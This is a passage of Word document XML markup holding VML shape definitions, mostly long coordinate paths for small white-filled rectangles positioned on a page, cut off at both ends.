,12165,3014,12165,3013,12165,3012,12165,3012,12165,3011,12165,3010,12165,3009,12165,3009,12165,3008,12165,3007,12165,3006,12165,3005,12165,3004,12165,3003,12165,3002,12165,3001,12165,3000,12165,2999,12165,2998,12165,2997,12165,2995,12165,2994,12165,2993,12165,2992,12165,2990,12165,2989,12165,2988,12165,2986,12165,2985,12165,2983,12165,2982,12165,2980,12165,2979,12165,2977,12165,2975,12165,2974,12165,2972,12165,2970,12165,2968,12165,2966,12165,2964,12165,2962,12165,2960,12165,2958,12165,2956,12165,2954,12165,2952,12165,2950,12165,2948,12165,2945,12165,2943,12165,2941,12165,2938,12165,2936,12165,2933,12165,2931,12165,2928,12165,2925,12165,2923,12165,2920,12165,2917,12165,2914,12165,2911,12165,2908,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12164,2905,12164,2905,12164,2905,12164,2905,12164,2905,12164,2905,12163,2905,12163,2905,12163,2905,12162,2905,12162,2905,12162,2905,12161,2905,12161,2905,12161,2905,12160,2905,12160,2905,12159,2905,12159,2905,12158,2905,12157,2905,12157,2905,12156,2905,12155,2905,12155,2905,12154,2905,12153,2905,12152,2905,12151,2905,12150,2905,12149,2905,12148,2905,12147,2905,12146,2905,12145,2905,12144,2905,12143,2905,12141,2905,12140,2905,12139,2905,12137,2905,12136,2905,12134,2905,12132,2905,12131,2905,12129,2905,12127,2905,12125,2905,12124,2905,12122,2905,12120,2905,12118,2905,12115,2905,12113,2905,12111,2905,12109,2905,12106,2905,12104,2905,12101,2905,12099,2905,12096,2905,12093,2905,12090,2905,12088,2905,12085,2905,12082,2905,12079,2905,12075,2905,12072,2905,12069,2905,12065,2905,12062,2905,12058,2905,12055,2905,12051,2905,12047,2905,12043,2905,12039,2905,12035,2905,12031,2905,12027,2905,12023,2905,12018,2905,12014,2905,12009,2905,12004,2905,12000,2905,11995,2905,11990,2905,11985,2905,11980,2905,11974,2905,11969,2905,11964,2905,11958,2905,11952,2905,11947,2905,11941,2905,11935,2905,11929,2905,11923,2905,11916,2905,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:11890;width:130;height:270" coordorigin="3010,11890" coordsize="130,270" path="m3026,11910l3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3027,11910,3027,11910,3027,11910,3027,11910,3027,11910,3027,11910,3027,11910,3028,11910,3028,11910,3028,11910,3028,11910,3029,11910,3029,11910,3029,11910,3029,11910,3030,11910,3030,11910,3030,11910,3031,11910,3031,11910,3032,11910,3032,11910,3032,11910,3033,11910,3033,11910,3034,11910,3034,11910,3035,11910,3036,11910,3036,11910,3037,11910,3037,11910,3038,11910,3039,11910,3039,11910,3040,11910,3041,11910,3042,11910,3043,11910,3043,11910,3044,11910,3045,11910,3046,11910,3047,11910,3048,11910,3049,11910,3050,11910,3051,11910,3052,11910,3053,11910,3054,11910,3056,11910,3057,11910,3058,11910,3059,11910,3061,11910,3062,11910,3063,11910,3065,11910,3066,11910,3068,11910,3069,11910,3071,11910,3072,11910,3074,11910,3076,11910,3077,11910,3079,11910,3081,11910,3083,11910,3085,11910,3087,11910,3089,11910,3091,11910,3093,11910,3095,11910,3097,11910,3099,11910,3101,11910,3103,11910,3106,11910,3108,11910,3110,11910,3113,11910,3115,11910,3118,11910,3120,11910,3123,11910,3126,11910,3128,11910,3131,11910,3134,11910,3137,11910,3140,11910,3143,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11911,3146,11911,3146,11911,3146,11911,3146,11911,3146,11911,3146,11911,3146,11912,3146,11912,3146,11912,3146,11912,3146,11913,3146,11913,3146,11913,3146,11914,3146,11914,3146,11915,3146,11915,3146,11915,3146,11916,3146,11916,3146,11917,3146,11918,3146,11918,3146,11919,3146,11920,3146,11920,3146,11921,3146,11922,3146,11923,3146,11924,3146,11925,3146,11926,3146,11927,3146,11928,3146,11929,3146,11930,3146,11931,3146,11933,3146,11934,3146,11935,3146,11937,3146,11938,3146,11940,3146,11941,3146,11943,3146,11944,3146,11946,3146,11948,3146,11950,3146,11952,3146,11954,3146,11956,3146,11958,3146,11960,3146,11962,3146,11964,3146,11967,3146,11969,3146,11971,3146,11974,3146,11976,3146,11979,3146,11982,3146,11985,3146,11988,3146,11990,3146,11993,3146,11997,3146,12000,3146,12003,3146,12006,3146,12010,3146,12013,3146,12017,3146,12020,3146,12024,3146,12028,3146,12032,3146,12036,3146,12040,3146,12044,3146,12048,3146,12052,3146,12057,3146,12061,3146,12066,3146,12071,3146,12075,3146,12080,3146,12085,3146,12090,3146,12095,3146,12101,3146,12106,3146,12112,3146,12117,3146,12123,3146,12128,3146,12134,3146,12140,3146,12146,3146,12152,3146,12159,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3144,12165,3144,12165,3144,12165,3144,12165,3144,12165,3144,12165,3143,12165,3143,12165,3143,12165,3143,12165,3143,12165,3142,12165,3142,12165,3142,12165,3141,12165,3141,12165,3141,12165,3140,12165,3140,12165,3140,12165,3139,12165,3139,12165,3138,12165,3138,12165,3137,12165,3137,12165,3136,12165,3136,12165,3135,12165,3134,12165,3134,12165,3133,12165,3132,12165,3132,12165,3131,12165,3130,12165,3129,12165,3129,12165,3128,12165,3127,12165,3126,12165,3125,12165,3124,12165,3123,12165,3122,12165,3121,12165,3120,12165,3119,12165,3118,12165,3117,12165,3116,12165,3114,12165,3113,12165,3112,12165,3110,12165,3109,12165,3108,12165,3106,12165,3105,12165,3103,12165,3102,12165,3100,12165,3099,12165,3097,12165,3095,12165,3094,12165,3092,12165,3090,12165,3088,12165,3086,12165,3084,12165,3083,12165,3081,12165,3079,12165,3076,12165,3074,12165,3072,12165,3070,12165,3068,12165,3065,12165,3063,12165,3061,12165,3058,12165,3056,12165,3053,12165,3051,12165,3048,12165,3045,12165,3043,12165,3040,12165,3037,12165,3034,12165,3031,12165,3029,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12164,3026,12164,3026,12164,3026,12164,3026,12164,3026,12164,3026,12163,3026,12163,3026,12163,3026,12162,3026,12162,3026,12162,3026,12161,3026,12161,3026,12161,3026,12160,3026,12160,3026,12159,3026,12159,3026,12158,3026,12157,3026,12157,3026,12156,3026,12155,3026,12155,3026,12154,3026,12153,3026,12152,3026,12151,3026,12150,3026,12149,3026,12148,3026,12147,3026,12146,3026,12145,3026,12144,3026,12143,3026,12141,3026,12140,3026,12139,3026,12137,3026,12136,3026,12134,3026,12132,3026,12131,3026,12129,3026,12127,3026,12125,3026,12124,3026,12122,3026,12120,3026,12118,3026,12115,3026,12113,3026,12111,3026,12109,3026,12106,3026,12104,3026,12101,3026,12099,3026,12096,3026,12093,3026,12090,3026,12088,3026,12085,3026,12082,3026,12079,3026,12075,3026,12072,3026,12069,3026,12065,3026,12062,3026,12058,3026,12055,3026,12051,3026,12047,3026,12043,3026,12039,3026,12035,3026,12031,3026,12027,3026,12023,3026,12018,3026,12014,3026,12009,3026,12004,3026,12000,3026,11995,3026,11990,3026,11985,3026,11980,3026,11974,3026,11969,3026,11964,3026,11958,3026,11952,3026,11947,3026,11941,3026,11935,3026,11929,3026,11923,3026,11916,3026,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:156.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3130,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:3130;top:11890;width:130;height:270" coordorigin="3130,11890" coordsize="130,270" path="m3146,11910l3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3147,11910,3147,11910,3147,11910,3147,11910,3147,11910,3147,11910,3148,11910,3148,11910,3148,11910,3148,11910,3148,11910,3149,11910,3149,11910,3149,11910,3149,11910,3150,11910,3150,11910,3150,11910,3151,11910,3151,11910,3152,11910,3152,11910,3153,11910,3153,11910,3153,11910,3154,11910,3154,11910,3155,11910,3156,11910,3156,11910,3157,11910,3157,11910,3158,11910,3159,11910,3159,11910,3160,11910,3161,11910,3162,11910,3163,11910,3163,11910,3164,11910,3165,11910,3166,11910,3167,11910,3168,11910,3169,11910,3170,11910,3171,11910,3172,11910,3173,11910,3174,11910,3176,11910,3177,11910,3178,11910,3179,11910,3181,11910,3182,11910,3183,11910,3185,11910,3186,11910,3188,11910,3189,11910,3191,11910,3192,11910,3194,11910,3196,11910,3198,11910,3199,11910,3201,11910,3203,11910,3205,11910,3207,11910,3209,11910,3211,11910,3213,11910,3215,11910,3217,11910,3219,11910,3221,11910,3223,11910,3226,11910,3228,11910,3230,11910,3233,11910,3235,11910,3238,11910,3240,11910,3243,11910,3246,11910,3248,11910,3251,11910,3254,11910,3257,11910,3260,11910,3263,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11911,3266,11911,3266,11911,3266,11911,3266,11911,3266,11911,3266,11911,3266,11912,3266,11912,3266,11912,3266,11912,3266,11913,3266,11913,3266,11913,3266,11914,3266,11914,3266,11915,3266,11915,3266,11915,3266,11916,3266,11916,3266,11917,3266,11918,3266,11918,3266,11919,3266,11920,3266,11920,3266,11921,3266,11922,3266,11923,3266,11924,3266,11925,3266,11926,3266,11927,3266,11928,3266,11929,3266,11930,3266,11931,3266,11933,3266,11934,3266,11935,3266,11937,3266,11938,3266,11940,3266,11941,3266,11943,3266,11944,3266,11946,3266,11948,3266,11950,3266,11952,3266,11954,3266,11956,3266,11958,3266,11960,3266,11962,3266,11964,3266,11967,3266,11969,3266,11971,3266,11974,3266,11976,3266,11979,3266,11982,3266,11985,3266,11988,3266,11990,3266,11993,3266,11997,3266,12000,3266,12003,3266,12006,3266,12010,3266,12013,3266,12017,3266,12020,3266,12024,3266,12028,3266,12032,3266,12036,3266,12040,3266,12044,3266,12048,3266,12052,3266,12057,3266,12061,3266,12066,3266,12071,3266,12075,3266,12080,3266,12085,3266,12090,3266,12095,3266,12101,3266,12106,3266,12112,3266,12117,3266,12123,3266,12128,3266,12134,3266,12140,3266,12146,3266,12152,3266,12159,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3264,12165,3264,12165,3264,12165,3264,12165,3264,12165,3264,12165,3263,12165,3263,12165,3263,12165,3263,12165,3262,12165,3262,12165,3262,12165,3261,12165,3261,12165,3261,12165,3260,12165,3260,12165,3260,12165,3259,12165,3259,12165,3258,12165,3258,12165,3257,12165,3257,12165,3256,12165,3256,12165,3255,12165,3254,12165,3254,12165,3253,12165,3252,12165,3252,12165,3251,12165,3250,12165,3249,12165,3249,12165,3248,12165,3247,12165,3246,12165,3245,12165,3244,12165,3243,12165,3242,12165,3241,12165,3240,12165,3239,12165,3238,12165,3237,12165,3236,12165,3234,12165,3233,12165,3232,12165,3231,12165,3229,12165,3228,12165,3226,12165,3225,12165,3223,12165,3222,12165,3220,12165,3219,12165,3217,12165,3215,12165,3214,12165,3212,12165,3210,12165,3208,12165,3206,12165,3205,12165,3203,12165,3201,12165,3199,12165,3197,12165,3194,12165,3192,12165,3190,12165,3188,12165,3186,12165,3183,12165,3181,12165,3178,12165,3176,12165,3173,12165,3171,12165,3168,12165,3166,12165,3163,12165,3160,12165,3157,12165,3154,12165,3152,12165,3149,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12164,3146,12164,3146,12164,3146,12164,3146,12164,3146,12164,3146,12163,3146,12163,3146,12163,3146,12162,3146,12162,3146,12162,3146,12161,3146,12161,3146,12161,3146,12160,3146,12160,3146,12159,3146,12159,3146,12158,3146,12157,3146,12157,3146,12156,3146,12155,3146,12155,3146,12154,3146,12153,3146,12152,3146,12151,3146,12150,3146,12149,3146,12148,3146,12147,3146,12146,3146,12145,3146,12144,3146,12143,3146,12141,3146,12140,3146,12139,3146,12137,3146,12136,3146,12134,3146,12132,3146,12131,3146,12129,3146,12127,3146,12125,3146,12124,3146,12122,3146,12120,3146,12118,3146,12115,3146,12113,3146,12111,3146,12109,3146,12106,3146,12104,3146,12101,3146,12099,3146,12096,3146,12093,3146,12090,3146,12088,3146,12085,3146,12082,3146,12079,3146,12075,3146,12072,3146,12069,3146,12065,3146,12062,3146,12058,3146,12055,3146,12051,3146,12047,3146,12043,3146,12039,3146,12035,3146,12031,3146,12027,3146,12023,3146,12018,3146,12014,3146,12009,3146,12004,3146,12000,3146,11995,3146,11990,3146,11985,3146,11980,3146,11974,3146,11969,3146,11964,3146,11958,3146,11952,3146,11947,3146,11941,3146,11935,3146,11929,3146,11923,3146,11916,3146,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:162.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3250,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:3250;top:11890;width:130;height:270" coordorigin="3250,11890" coordsize="130,270" path="m3266,11910l3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3267,11910,3267,11910,3267,11910,3267,11910,3267,11910,3267,11910,3267,11910,3268,11910,3268,11910,3268,11910,3268,11910,3268,11910,3269,11910,3269,11910,3269,11910,3270,11910,3270,11910,3270,11910,3271,11910,3271,11910,3271,11910,3272,11910,3272,11910,3273,11910,3273,11910,3274,11910,3274,11910,3275,11910,3275,11910,3276,11910,3276,11910,3277,11910,3277,11910,3278,11910,3279,11910,3280,11910,3280,11910,3281,11910,3282,11910,3283,11910,3283,11910,3284,11910,3285,11910,3286,11910,3287,11910,3288,11910,3289,11910,3290,11910,3291,11910,3292,11910,3293,11910,3295,11910,3296,11910,3297,11910,3298,11910,3299,11910,3301,11910,3302,11910,3304,11910,3305,11910,3306,11910,3308,11910,3309,11910,3311,11910,3313,11910,3314,11910,3316,11910,3318,11910,3319,11910,3321,11910,3323,11910,3325,11910,3327,11910,3329,11910,3331,11910,3333,11910,3335,11910,3337,11910,3339,11910,3341,11910,3343,11910,3346,11910,3348,11910,3350,11910,3353,11910,3355,11910,3358,11910,3360,11910,3363,11910,3366,11910,3368,11910,3371,11910,3374,11910,3377,11910,3380,11910,3383,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11911,3386,11911,3386,11911,3386,11911,3386,11911,3386,11911,3386,11911,3386,11912,3386,11912,3386,11912,3386,11912,3386,11913,3386,11913,3386,11913,3386,11914,3386,11914,3386,11915,3386,11915,3386,11915,3386,11916,3386,11916,3386,11917,3386,11918,3386,11918,3386,11919,3386,11920,3386,11920,3386,11921,3386,11922,3386,11923,3386,11924,3386,11925,3386,11926,3386,11927,3386,11928,3386,11929,3386,11930,3386,11931,3386,11933,3386,11934,3386,11935,3386,11937,3386,11938,3386,11940,3386,11941,3386,11943,3386,11944,3386,11946,3386,11948,3386,11950,3386,11952,3386,11954,3386,11956,3386,11958,3386,11960,3386,11962,3386,11964,3386,11967,3386,11969,3386,11971,3386,11974,3386,11976,3386,11979,3386,11982,3386,11985,3386,11988,3386,11990,3386,11993,3386,11997,3386,12000,3386,12003,3386,12006,3386,12010,3386,12013,3386,12017,3386,12020,3386,12024,3386,12028,3386,12032,3386,12036,3386,12040,3386,12044,3386,12048,3386,12052,3386,12057,3386,12061,3386,12066,3386,12071,3386,12075,3386,12080,3386,12085,3386,12090,3386,12095,3386,12101,3386,12106,3386,12112,3386,12117,3386,12123,3386,12128,3386,12134,3386,12140,3386,12146,3386,12152,3386,12159,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3384,12165,3384,12165,3384,12165,3384,12165,3384,12165,3384,12165,3383,12165,3383,12165,3383,12165,3383,12165,3382,12165,3382,12165,3382,12165,3381,12165,3381,12165,3381,12165,3380,12165,3380,12165,3380,12165,3379,12165,3379,12165,3378,12165,3378,12165,3377,12165,3377,12165,3376,12165,3376,12165,3375,12165,3374,12165,3374,12165,3373,12165,3373,12165,3372,12165,3371,12165,3370,12165,3370,12165,3369,12165,3368,12165,3367,12165,3366,12165,3365,12165,3364,12165,3363,12165,3362,12165,3361,12165,3360,12165,3359,12165,3358,12165,3357,12165,3356,12165,3354,12165,3353,12165,3352,12165,3351,12165,3349,12165,3348,12165,3346,12165,3345,12165,3343,12165,3342,12165,3340,12165,3339,12165,3337,12165,3335,12165,3334,12165,3332,12165,3330,12165,3328,12165,3327,12165,3325,12165,3323,12165,3321,12165,3319,12165,3317,12165,3314,12165,3312,12165,3310,12165,3308,12165,3306,12165,3303,12165,3301,12165,3298,12165,3296,12165,3293,12165,3291,12165,3288,12165,3286,12165,3283,12165,3280,12165,3277,12165,3274,12165,3272,12165,3269,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12164,3266,12164,3266,12164,3266,12164,3266,12164,3266,12164,3266,12163,3266,12163,3266,12163,3266,12162,3266,12162,3266,12162,3266,12161,3266,12161,3266,12161,3266,12160,3266,12160,3266,12159,3266,12159,3266,12158,3266,12157,3266,12157,3266,12156,3266,12155,3266,12155,3266,12154,3266,12153,3266,12152,3266,12151,3266,12150,3266,12149,3266,12148,3266,12147,3266,12146,3266,12145,3266,12144,3266,12143,3266,12141,3266,12140,3266,12139,3266,12137,3266,12136,3266,12134,3266,12132,3266,12131,3266,12129,3266,12127,3266,12125,3266,12124,3266,12122,3266,12120,3266,12118,3266,12115,3266,12113,3266,12111,3266,12109,3266,12106,3266,12104,3266,12101,3266,12099,3266,12096,3266,12093,3266,12090,3266,12088,3266,12085,3266,12082,3266,12079,3266,12075,3266,12072,3266,12069,3266,12065,3266,12062,3266,12058,3266,12055,3266,12051,3266,12047,3266,12043,3266,12039,3266,12035,3266,12031,3266,12027,3266,12023,3266,12018,3266,12014,3266,12009,3266,12004,3266,12000,3266,11995,3266,11990,3266,11985,3266,11980,3266,11974,3266,11969,3266,11964,3266,11958,3266,11952,3266,11947,3266,11941,3266,11935,3266,11929,3266,11923,3266,11916,3266,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3370,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:3370;top:11890;width:130;height:270" coordorigin="3370,11890" coordsize="130,270" path="m3386,11910l3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3387,11910,3387,11910,3387,11910,3387,11910,3387,11910,3387,11910,3387,11910,3388,11910,3388,11910,3388,11910,3388,11910,3389,11910,3389,11910,3389,11910,3389,11910,3390,11910,3390,11910,3390,11910,3391,11910,3391,11910,3391,11910,3392,11910,3392,11910,3393,11910,3393,11910,3394,11910,3394,11910,3395,11910,3395,11910,3396,11910,3396,11910,3397,11910,3398,11910,3398,11910,3399,11910,3400,11910,3400,11910,3401,11910,3402,11910,3403,11910,3404,11910,3404,11910,3405,11910,3406,11910,3407,11910,3408,11910,3409,11910,3410,11910,3411,11910,3412,11910,3413,11910,3415,11910,3416,11910,3417,11910,3418,11910,3420,11910,3421,11910,3422,11910,3424,11910,3425,11910,3426,11910,3428,11910,3429,11910,3431,11910,3433,11910,3434,11910,3436,11910,3438,11910,3439,11910,3441,11910,3443,11910,3445,11910,3447,11910,3449,11910,3451,11910,3453,11910,3455,11910,3457,11910,3459,11910,3461,11910,3464,11910,3466,11910,3468,11910,3471,11910,3473,11910,3475,11910,3478,11910,3481,11910,3483,11910,3486,11910,3489,11910,3491,11910,3494,11910,3497,11910,3500,11910,3503,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11911,3506,11911,3506,11911,3506,11911,3506,11911,3506,11911,3506,11911,3506,11912,3506,11912,3506,11912,3506,11912,3506,11913,3506,11913,3506,11913,3506,11914,3506,11914,3506,11915,3506,11915,3506,11915,3506,11916,3506,11916,3506,11917,3506,11918,3506,11918,3506,11919,3506,11920,3506,11920,3506,11921,3506,11922,3506,11923,3506,11924,3506,11925,3506,11926,3506,11927,3506,11928,3506,11929,3506,11930,3506,11931,3506,11933,3506,11934,3506,11935,3506,11937,3506,11938,3506,11940,3506,11941,3506,11943,3506,11944,3506,11946,3506,11948,3506,11950,3506,11952,3506,11954,3506,11956,3506,11958,3506,11960,3506,11962,3506,11964,3506,11967,3506,11969,3506,11971,3506,11974,3506,11976,3506,11979,3506,11982,3506,11985,3506,11988,3506,11990,3506,11993,3506,11997,3506,12000,3506,12003,3506,12006,3506,12010,3506,12013,3506,12017,3506,12020,3506,12024,3506,12028,3506,12032,3506,12036,3506,12040,3506,12044,3506,12048,3506,12052,3506,12057,3506,12061,3506,12066,3506,12071,3506,12075,3506,12080,3506,12085,3506,12090,3506,12095,3506,12101,3506,12106,3506,12112,3506,12117,3506,12123,3506,12128,3506,12134,3506,12140,3506,12146,3506,12152,3506,12159,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3504,12165,3504,12165,3504,12165,3504,12165,3504,12165,3503,12165,3503,12165,3503,12165,3503,12165,3502,12165,3502,12165,3502,12165,3502,12165,3501,12165,3501,12165,3500,12165,3500,12165,3500,12165,3499,12165,3499,12165,3498,12165,3498,12165,3497,12165,3497,12165,3496,12165,3496,12165,3495,12165,3495,12165,3494,12165,3493,12165,3493,12165,3492,12165,3491,12165,3490,12165,3490,12165,3489,12165,3488,12165,3487,12165,3486,12165,3485,12165,3484,12165,3483,12165,3482,12165,3481,12165,3480,12165,3479,12165,3478,12165,3477,12165,3476,12165,3474,12165,3473,12165,3472,12165,3471,12165,3469,12165,3468,12165,3466,12165,3465,12165,3464,12165,3462,12165,3460,12165,3459,12165,3457,12165,3456,12165,3454,12165,3452,12165,3450,12165,3448,12165,3447,12165,3445,12165,3443,12165,3441,12165,3439,12165,3437,12165,3435,12165,3432,12165,3430,12165,3428,12165,3426,12165,3423,12165,3421,12165,3418,12165,3416,12165,3413,12165,3411,12165,3408,12165,3406,12165,3403,12165,3400,12165,3397,12165,3395,12165,3392,12165,3389,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12164,3386,12164,3386,12164,3386,12164,3386,12164,3386,12164,3386,12163,3386,12163,3386,12163,3386,12162,3386,12162,3386,12162,3386,12161,3386,12161,3386,12161,3386,12160,3386,12160,3386,12159,3386,12159,3386,12158,3386,12157,3386,12157,3386,12156,3386,12155,3386,12155,3386,12154,3386,12153,3386,12152,3386,12151,3386,12150,3386,12149,3386,12148,3386,12147,3386,12146,3386,12145,3386,12144,3386,12143,3386,12141,3386,12140,3386,12139,3386,12137,3386,12136,3386,12134,3386,12132,3386,12131,3386,12129,3386,12127,3386,12125,3386,12124,3386,12122,3386,12120,3386,12118,3386,12115,3386,12113,3386,12111,3386,12109,3386,12106,3386,12104,3386,12101,3386,12099,3386,12096,3386,12093,3386,12090,3386,12088,3386,12085,3386,12082,3386,12079,3386,12075,3386,12072,3386,12069,3386,12065,3386,12062,3386,12058,3386,12055,3386,12051,3386,12047,3386,12043,3386,12039,3386,12035,3386,12031,3386,12027,3386,12023,3386,12018,3386,12014,3386,12009,3386,12004,3386,12000,3386,11995,3386,11990,3386,11985,3386,11980,3386,11974,3386,11969,3386,11964,3386,11958,3386,11952,3386,11947,3386,11941,3386,11935,3386,11929,3386,11923,3386,11916,3386,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:216.500pt;margin-top:613.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4330,12270" coordsize="130,270">
        <v:shape style="position:absolute;left:4330;top:12270;width:130;height:270" coordorigin="4330,12270" coordsize="130,270" path="m4346,12285l4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4346,12285,4347,12285,4347,12285,4347,12285,4347,12285,4347,12285,4347,12285,4347,12285,4347,12285,4347,12285,4347,12285,4348,12285,4348,12285,4348,12285,4348,12285,4348,12285,4349,12285,4349,12285,4349,12285,4349,12285,4350,12285,4350,12285,4350,12285,4350,12285,4351,12285,4351,12285,4351,12285,4352,12285,4352,12285,4353,12285,4353,12285,4354,12285,4354,12285,4355,12285,4355,12285,4356,12285,4356,12285,4357,12285,4357,12285,4358,12285,4359,12285,4359,12285,4360,12285,4361,12285,4362,12285,4362,12285,4363,12285,4364,12285,4365,12285,4366,12285,4367,12285,4368,12285,4369,12285,4370,12285,4371,12285,4372,12285,4373,12285,4374,12285,4375,12285,4376,12285,4377,12285,4379,12285,4380,12285,4381,12285,4383,12285,4384,12285,4385,12285,4387,12285,4388,12285,4390,12285,4392,12285,4393,12285,4395,12285,4396,12285,4398,12285,4400,12285,4402,12285,4403,12285,4405,12285,4407,12285,4409,12285,4411,12285,4413,12285,4415,12285,4417,12285,4420,12285,4422,12285,4424,12285,4426,12285,4429,12285,4431,12285,4433,12285,4436,12285,4438,12285,4441,12285,4444,12285,4446,12285,4449,12285,4452,12285,4455,12285,4457,12285,4460,12285,4463,12285,4466,12285,4466,12285,4466,12285,4466,12285,4466,12285,4466,12285,4466,12285,4466,12285,4466,12285,4466,12285,4466,12285,4466,12285,4466,12285,4466,12285,4466,12286,4466,12286,4466,12286,4466,12286,4466,12286,4466,12286,4466,12286,4466,12286,4466,12287,4466,12287,4466,12287,4466,12287,4466,12288,4466,12288,4466,12288,4466,12289,4466,12289,4466,12289,4466,12290,4466,12290,4466,12291,4466,12291,4466,12292,4466,12292,4466,12293,4466,12293,4466,12294,4466,12295,4466,12296,4466,12296,4466,12297,4466,12298,4466,12299,4466,12300,4466,12301,4466,12302,4466,12303,4466,12304,4466,12305,4466,12306,4466,12308,4466,12309,4466,12310,4466,12312,4466,12313,4466,12315,4466,12316,4466,12318,4466,12320,4466,12321,4466,12323,4466,12325,4466,12327,4466,12329,4466,12331,4466,12333,4466,12335,4466,12337,4466,12339,4466,12342,4466,12344,4466,12347,4466,12349,